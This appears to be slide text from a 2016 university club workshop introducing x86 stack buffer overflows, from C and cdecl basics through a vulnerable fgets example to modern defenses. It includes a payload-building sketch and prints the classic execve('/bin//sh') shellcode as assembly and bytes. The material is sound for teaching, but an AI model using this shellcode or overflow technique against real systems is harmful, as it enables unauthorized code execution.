Intro to Binary Exploitation

Mark Mossberg

NU Hacks

Spring 2016

github.com/hacks/ibe2016

whoami

  • Senior computer engineering major

  • Low level enthusiast

  • CTF casual

    • Mostly with Shellphish

  • http://vmresu.me

Agenda

  • Introduction
  • Background Info
    • Crash course in C, x86 
  • Stack buffer overflow
    • Vulnerability
    • Exploitation
  • Workshop

Disclaimers

  • All information provided in this presentation exists for educational purposes only.
  • This is not "modern" exploitation.
  • Much of the following is only relevant for x86 Linux.

What is Binary Exploitation?

Binary exploitation is the art of bending a computer program to your will

From https://picoctf.com/learn

What is Binary Exploitation?

  • Binary: Executable file containing a computer program in the form of machine instructions
  • Exploitation: Taking advantage of a vulnerability in a computer program in order to cause unintended behavior (Wikipedia)

Unintended behavior?

  • Read: "Arbitrary Code Execution"
  • Primary objective of exploitation
  • "Code" == Processor Instructions
  • Basically, take over their CPU and force it to do whatever we want.
  • The code we execute is called the "payload"

High Level Challenges

  1. Hijack program's execution flow
  2. Perform arbitrary computation

C

  • Created in the 1970s for writing UNIX
  • Imperative, statically typed, compiled
  • "Low level", largely used for systems programming
  • Widespread
    • Operating Systems
    • Embedded Systems
    • Network Services
    • Programming Languages 🐍
  • Memory unsafe

For more extensive background, see http://github.com/rpisec/mbe

C Strings

  • No "strings", just NULL-terminated char arrays
    • "NULL-terminated" == ends with a '\0' char
  • Many libc APIs are oriented around this
    • String operations: strcpy(), strcat(), strlen(), etc.
    • I/O operations: fgets(), puts(), printf(), etc.
  • Bug prone :)
// this is not good C,
// just illustrating buffers
#include <stdio.h>
#include <string.h>

void hello(void) {
    char message[10];
    strcpy(message, "Hello\n");
    printf("%s", message);
}
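
A rough way to look at the same 10-byte buffer from Python, using ctypes to allocate a C char array. This is only an illustration of where the terminating '\0' sits; the variable names are made up for this sketch.

```python
import ctypes

# Allocate a 10-byte C char array, like `char message[10]`, and
# initialise it with "Hello\n". ctypes zero-fills the unused bytes.
message = ctypes.create_string_buffer(b"Hello\n", 10)

raw_bytes = message.raw    # all 10 bytes, including the trailing '\0' bytes
c_string = message.value   # bytes up to (not including) the first '\0'

print(raw_bytes)
print(c_string)
```

The C string is only the part before the first '\0'; the array itself is still 10 bytes long.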

x86

  • 32 bit CPU Architecture designed by Intel
    • Defines a set of "instructions" available for programs to use: low level operations like arithmetic and memory access
    • Defines set of "registers" for computation and state (think hardware variables)
      • Important ones: esp (stack ptr), ebp (frame ptr), eip (instruction ptr)
  • Little endian
    • In memory, numbers are stored least significant byte (LSB) first
    • Will be relevant when writing our exploit payload
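
A small sketch of what little endian means for a 32-bit address, using Python's struct module. The address value is just an example.

```python
import struct

address = 0x080483cb  # example 32-bit address

# "<I" means little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", address)

# The least significant byte (0xcb) comes first in memory.
print(packed.hex())

# Unpacking with the same format recovers the original number.
unpacked = struct.unpack("<I", packed)[0]
```

This is the byte order an overwritten return address has to be written in.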

C Compilation: Stack Variables

void myfunction(void) {
    // local, stack variables.
    int a = 1;
    int b = 2;
    int c = 3;
}
  • Function local variables are allocated in "stack" memory
  • Implemented by the compiler as subtracting the space needed (in bytes) from the esp (stack ptr) register
    • The stack grows down, toward lower addresses
080483cb <myfunction>:
 80483cb:  push   ebp
 80483cc:  mov    ebp,esp
 80483ce:  sub    esp,0x10
 80483d1:  mov    DWORD PTR [ebp-0x4],0x1
 80483d8:  mov    DWORD PTR [ebp-0x8],0x2
 80483df:  mov    DWORD PTR [ebp-0xc],0x3
 80483e6:  leave
 80483e7:  ret
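
The arithmetic in the listing above can be sketched as follows. The starting ebp value is hypothetical; only the offsets come from the disassembly.

```python
ebp = 0xbffff000   # hypothetical frame pointer after `mov ebp,esp`
esp = ebp          # at this point esp == ebp

esp -= 0x10        # `sub esp,0x10` reserves 16 bytes for locals

# Addresses of the three locals, taken from the [ebp-N] operands.
slots = {
    "a": ebp - 0x4,
    "b": ebp - 0x8,
    "c": ebp - 0xc,
}

for name, addr in slots.items():
    print(name, hex(addr))
```

All three locals land between the new esp and ebp, at addresses lower than ebp.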

C Compilation: Function Calls

void myfunction2(int a, int b, int c);

void myfunction1(void) {
    myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
    a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
 80483cb: push   ebp
 80483cc: mov    ebp,esp
 80483ce: sub    esp,0x8
 80483d1: sub    esp,0x4
 80483d4: push   0x3
 80483d6: push   0x2
 80483d8: push   0x1
 80483da: call   80483e4 <myfunction2>
 80483df: add    esp,0x10
 80483e2: leave
 80483e3: ret

080483e4 <myfunction2>:
 80483e4: push   ebp
 80483e5: mov    ebp,esp
 80483e7: mov    DWORD PTR [ebp+0x8],0xff
 80483ee: mov    DWORD PTR [ebp+0xc],0xff
 80483f5: mov    DWORD PTR [ebp+0x10],0xff
 80483fc: pop    ebp
 80483fd: ret

myfunc2

  • "cdecl" calling convention
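  • Caller pushes arguments onto the stack (right to left), then executes the call instruction
    • call pushes the return address (the address of the next instruction) onto the stack, then jumps to its operand
  • Callee sets up a new frame with ebp/esp. At the end of the function, it restores the stack and executes ret
    • ret pops the top of the stack into eip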
  • This is how functions know where to return to
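
The call/ret mechanics above can be modeled with a toy machine. This is a simplified sketch, not an emulator: the Machine class and the starting esp value are invented for illustration, and the code addresses are taken from the listing.

```python
class Machine:
    """Toy model of esp, eip and a stack made of 4-byte slots."""

    def __init__(self, esp, eip):
        self.esp = esp
        self.eip = eip
        self.memory = {}

    def push(self, value):
        self.esp -= 4                 # stack grows toward lower addresses
        self.memory[self.esp] = value

    def pop(self):
        value = self.memory[self.esp]
        self.esp += 4
        return value

    def call(self, target, next_instruction):
        self.push(next_instruction)   # save the return address
        self.eip = target             # jump to the callee

    def ret(self):
        self.eip = self.pop()         # resume wherever the stack says


m = Machine(esp=0xbffff000, eip=0x080483d4)   # esp value is hypothetical
for arg in (3, 2, 1):                         # arguments pushed right to left
    m.push(arg)
m.call(0x080483e4, next_instruction=0x080483df)
return_slot = m.esp                           # where the return address lives
m.ret()
```

ret trusts whatever value is in the return slot, which is why that slot matters so much later on.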

Takeaway: Program execution control data is stored on stack!

Memory Unsafety

  • C does not stop you from trampling your own memory
    • You crash if you're lucky
  • Programmer's responsibility to ensure safety, not language's
  • Memory Corruption: when the contents of a memory location are unintentionally modified due to programming errors
    • ex: Writing off the end of an array

Definition from https://en.m.wikipedia.org/wiki/Memory_corruption

void func(void) {
    int arr[4];
    for (int i = 0; i < 8; i++) {
        arr[i] = 0xffffffff;
    }
}

Corrupting Stack Memory!

The compiler will still build it, though (the behavior is undefined)
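
A simplified model of what that loop does to the stack frame. The layout (arr directly below the saved ebp and return address) and the saved values are assumptions for illustration; a real compiler may arrange the frame differently.

```python
import struct

# Assumed layout, low to high addresses:
#   arr[4] (16 bytes) | saved ebp | return address | 8 bytes of caller data
frame = bytearray(32)
struct.pack_into("<I", frame, 16, 0xbffff018)   # saved ebp (hypothetical)
struct.pack_into("<I", frame, 20, 0x080483df)   # return address (hypothetical)

# Same bounds as the C loop: i < 8, even though arr only has 4 elements.
for i in range(8):
    struct.pack_into("<I", frame, 4 * i, 0xffffffff)

saved_ebp, return_address = struct.unpack_from("<II", frame, 16)
print(hex(saved_ebp), hex(return_address))
```

Iterations 4 through 7 write past the end of arr, so in this model both saved values are gone.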

Spot the bug

void func(void) {
    // 15 byte string + NULL
    char buf[16];
    // read up to 165 bytes + NULL from stdin
    fgets(buf, 166, stdin);
    printf("Hello %s\n", buf);
}

What's dangerous about this code?

The user controls up to 150 bytes past the end of buf (including the return address)!
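
Where the 150 comes from, as a quick worked calculation. The constant names are made up for this sketch; the numbers are from the code on the slide.

```python
BUF_SIZE = 16        # char buf[16]
FGETS_LIMIT = 166    # second argument to fgets()

# fgets(buf, n, stream) stores at most n - 1 characters,
# then appends a terminating '\0'.
max_data_bytes = FGETS_LIMIT - 1
bytes_written = max_data_bytes + 1

# Everything beyond the 16 bytes of buf lands on whatever follows it.
overflow = bytes_written - BUF_SIZE
print(overflow)
```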

Stack Buffer Overflows

  • Result from bugs that allow more data to be written onto the stack than the space allocated for it
  • Commonly seen in C string handling
  • Dangerous, because program control info (the return address) is stored on the stack and can be corrupted

High Level Challenges

  1. ✅ Hijack program's execution flow
  2. Perform arbitrary computation

Exploitation

  • Use buffer overflow to copy our payload onto the stack
  • Corrupt the return address on the stack to point to it
  • When function returns, our payload executes
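
One possible payload layout, sketched in Python. Everything numeric here is an assumption: the offset from the buffer to the return address and the buffer's address depend on the target binary and have to be found with a debugger. The shellcode is a 25-byte placeholder of int3 (0xcc) bytes, and build_payload is a hypothetical helper.

```python
import struct

OFFSET_TO_RET = 28        # hypothetical: bytes from start of buf to return address
BUF_ADDR = 0xbffff5c0     # hypothetical: address of buf on the stack
MAX_INPUT = 165           # fgets(buf, 166, stdin) reads at most 165 bytes

placeholder_shellcode = b"\xcc" * 25   # int3 breakpoints standing in for real code


def build_payload(shellcode, offset_to_ret, buf_addr):
    """Layout: padding | new return address | shellcode."""
    padding = b"A" * offset_to_ret
    # The shellcode sits right after the 4-byte return address slot.
    shellcode_addr = buf_addr + offset_to_ret + 4
    return padding + struct.pack("<I", shellcode_addr) + shellcode


payload = build_payload(placeholder_shellcode, OFFSET_TO_RET, BUF_ADDR)

# fgets stops at a newline, so the payload must not contain one.
fits = len(payload) <= MAX_INPUT and b"\n" not in payload
```

Placing the shellcode after the return address, rather than inside buf, is a design choice in this sketch: once the function returns, anything the payload pushes lands below it instead of on top of it.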

High Level Challenges

  1. ✅ Hijack program's execution flow
  2. ✅ Perform arbitrary computation

Exploit Payload ("Shellcode")

  • What code should we put on the stack?
  • Code that executes a shell! (Gives us access to the system)
    • Note: Payloads don't have to exec a shell to be called shellcode
  • Traditionally written in assembly due to constraints on size and on which byte values the payload may contain

Exploit Payload ("Shellcode")

  • How will our shellcode execute a shell?
  • How does any program execute any other program?
  • execve()

System Calls

  • System Call: The interface programs use for calling into the Operating System
  • Programs use them for anything that touches the outside world (files, network, other processes)
  • If we want our exploit payload to do anything, it will need to trigger a syscall
    • "execve" is the syscall used to execute other programs
  • Triggered by architecture specific instructions
    • For x86, we'll use "int 0x80"
int execve(const char *filename, char *const argv[], char *const envp[]);
  • Arg 1: Path to file to execute
    • "/bin/sh"
  • Arg 2: Array of program arguments
    • {"/bin/sh", NULL}
  • Arg 3: Array of environment vars
    • NULL
  • Set syscall arguments in registers before triggering syscall instruction
    • eax = syscall # (0xb)
    • ebx = filename
    • ecx = argv
    • edx = envp
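
The same three arguments can be seen from a high level language. This sketch assumes a POSIX system with /bin/sh; run_sh is a hypothetical helper, and it passes "-c" plus a command (unlike the slide's argv) so the shell exits on its own instead of waiting for input.

```python
import os


def run_sh(command):
    """Fork, execve /bin/sh in the child, return the child's exit code."""
    pid = os.fork()
    if pid == 0:
        # Child: replace this process with /bin/sh.
        # Arguments are filename, argv, envp (an empty environment here).
        try:
            os.execve("/bin/sh", ["/bin/sh", "-c", command], {})
        finally:
            os._exit(127)   # only reached if execve itself failed
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status)


exit_code = run_sh("exit 7")
print(exit_code)
```

execve does not return on success, which is why the child needs no code after it other than the failure path.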

Writing Shellcode

  1. Write in C
  2. Hand compile to x86
  3. Assemble to machine code
char *args[] = {"/bin/sh", NULL};
execve(args[0], args, NULL);
; I didn't write this, I found it on the
; internet a while ago

xor    eax,eax    ; eax = 0
push   eax        ; push 4 zero bytes (string terminator)
push   0x68732f2f ; "//sh"
push   0x6e69622f ; "/bin": the stack now holds "/bin//sh\0"
mov    ebx,esp    ; char *ebx = "/bin//sh";
push   eax        ; argv[1] = NULL
push   ebx        ; argv[0] = "/bin//sh"
mov    ecx,esp    ; char **ecx = {"/bin//sh", NULL};
mov    edx,eax    ; edx = NULL (envp)
mov    al,0xb     ; eax = 0xb, the syscall number for execve
int    0x80       ; trigger syscall
sc = (b"\x31\xc0\x50\x68\x2f" +
      b"\x2f\x73\x68\x68\x2f" +
      b"\x62\x69\x6e\x89\xe3" +
      b"\x50\x53\x89\xe1\x89" +
      b"\xc2\xb0\x0b\xcd\x80")
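
A few sanity checks on those bytes, sketched in Python. The checks are additions for illustration; the byte values are copied from the listing above.

```python
import struct

sc = (b"\x31\xc0\x50\x68\x2f"
      b"\x2f\x73\x68\x68\x2f"
      b"\x62\x69\x6e\x89\xe3"
      b"\x50\x53\x89\xe1\x89"
      b"\xc2\xb0\x0b\xcd\x80")

# The two pushed immediates, read from low to high addresses.
# 0x6e69622f is pushed last, so it ends up at the lower address.
path_on_stack = struct.pack("<II", 0x6e69622f, 0x68732f2f)
print(path_on_stack)

length = len(sc)
has_zero_byte = b"\x00" in sc
ends_with_int80 = sc.endswith(b"\xcd\x80")   # cd 80 encodes `int 0x80`
```

The doubled slash in "/bin//sh" pads the path to exactly 8 bytes, so it fits in two 4-byte pushes without any zero bytes in the instruction stream.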

Modern Defenses

  • DEP/NX (Data Execution Prevention/No eXecute)
    • Hardware support, marks data memory such as the stack non-executable
  • ASLR (Address Space Layout Randomization)
    • Randomizes where the stack, heap, and libraries are loaded, so addresses are hard to predict
  • Stack Cookies/Canaries
    • Compiler inserts code to check integrity of stack before returning from functions
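
A toy model of the stack cookie idea. The frame layout, the canary value, and both helper functions are invented for this sketch; real compilers pick a random value at program start and place the check in the function epilogue.

```python
import struct

CANARY = 0xdeadbe00   # hypothetical value; real canaries are random per process


def make_frame(canary, return_address):
    # Assumed layout, low to high: buf[16] | canary | saved ebp | return address
    return bytearray(16) + struct.pack("<III", canary, 0xbffff018, return_address)


def canary_intact(frame, canary):
    # The check the compiler would insert before the function returns.
    return struct.unpack_from("<I", frame, 16)[0] == canary


frame = make_frame(CANARY, 0x080483df)
ok_before = canary_intact(frame, CANARY)

# A linear overflow from buf has to cross the canary to reach the return address.
overflow = b"A" * 28
frame[0:len(overflow)] = overflow
ok_after = canary_intact(frame, CANARY)

print(ok_before, ok_after)
```

Because the canary sits between the buffer and the return address, the overwrite is detected before ret runs.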

Local vs Remote Exploits

  • Local Exploit: Exploiting a program running on the same machine
    • Privilege Escalation
  • Remote Exploit: Exploiting a program running on a different machine (over a network)
    • ex: JailbreakMe

That was a lot! Let's pwn some stuff.

Questions?/Workshop

By offlinemark

NU Hacks talk, 3/31/16.